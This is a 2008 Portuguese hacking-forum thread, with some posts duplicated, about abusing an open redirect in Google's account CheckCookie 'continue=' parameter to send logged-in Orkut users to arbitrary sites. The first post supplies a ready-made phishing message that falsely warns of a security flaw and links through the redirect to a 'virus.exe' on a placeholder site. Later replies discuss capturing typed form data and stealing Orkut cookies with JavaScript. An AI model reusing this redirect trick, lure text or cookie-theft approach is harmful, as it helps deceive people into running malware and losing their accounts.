Title: Redirecionando login no orkut
Post by: Cleese on 26 de July , 2008, 07:25:06 PM
Post by: Cleese on 26 de July , 2008, 07:25:06 PM
Tava dando umas olhadas em como funciona o login no orkut e encontrei isso:
https://www.google.com/accounts/CheckCookie?continue= (https://www.google.com/accounts/CheckCookie?continue=)
Depois de continue, você pode botar qualquer site, no exemplo o site do google. Então ficamos com:
https://www.google.com/accounts/CheckCo ... google.com (https://www.google.com/accounts/CheckCookie?continue=http://google.com)
Note que é importante o uso do "http://" pois se não o sever irá procurar um arquivo local.
O interessante é que se a pessoa estiver logada no google (qualquer serviço do google) irá redirecionar pra página depois do "continue=", sem perguntar nada.
Muuito fácil se fazer uma SEing com isso, e fiz um exemplo.
Então, que começem as SEings! lol
https://www.google.com/accounts/CheckCookie?continue= (https://www.google.com/accounts/CheckCookie?continue=)
Depois de continue, você pode botar qualquer site, no exemplo o site do google. Então ficamos com:
https://www.google.com/accounts/CheckCo ... google.com (https://www.google.com/accounts/CheckCookie?continue=http://google.com)
Note que é importante o uso do "http://" pois se não o sever irá procurar um arquivo local.
O interessante é que se a pessoa estiver logada no google (qualquer serviço do google) irá redirecionar pra página depois do "continue=", sem perguntar nada.
Muuito fácil se fazer uma SEing com isso, e fiz um exemplo.
QuoteOs desenvolvedores do Google? descobriram uma falha onde o hacker pode facilmente roubar senhas e orkuts. Estão roubando milhões por dia, e o próximo pode ser o seu. Felizmente, conseguimos fazer uma correção para a falha. Apenas baixa este arquivo e o execute e a falha será corrigida. Para baixar, você tem de estar logada na sua conta Google?. Link: https://www.google.com/accounts/CheckCo ... /virus.exe (https://www.google.com/accounts/CheckCookie?continue=http://www.seusite.com/viruses/virus.exe)
Então, que começem as SEings! lol
Title: Re: Redirecionando login no orkut
Post by: black0ut on 29 de July , 2008, 02:19:51 AM
Post by: black0ut on 29 de July , 2008, 02:19:51 AM
Legal. Você sabe se após redirecionar o usuário o POST é mantido?
Title: Re: Redirecionando login no orkut
Post by: Cleese on 30 de July , 2008, 08:15:38 PM
Post by: Cleese on 30 de July , 2008, 08:15:38 PM
se com isso vc quis dizer se continua logado, continua sim.
Title: Re: Redirecionando login no orkut
Post by: black0ut on 13 de August , 2008, 01:44:47 PM
Post by: black0ut on 13 de August , 2008, 01:44:47 PM
O que eu queria saber é se dá pra pegar os dados dos campos digitados por $_POST :(
Title: Re: Redirecionando login no orkut
Post by: L3m4rk on 13 de August , 2008, 05:18:28 PM
Post by: L3m4rk on 13 de August , 2008, 05:18:28 PM
Eu gostaria de saber se tem como pegar os cookies do orkut atraves de um link que mandar para a pessoa, mas claro sem prescisar ter a vul xss no orkut 
Title: Re: Redirecionando login no orkut
Post by: Cleese on 13 de August , 2008, 06:35:24 PM
Post by: Cleese on 13 de August , 2008, 06:35:24 PM
com aqueles velhos js pra roubar cookies acho que sim.. mas a pessoa teria de estar logada no orkut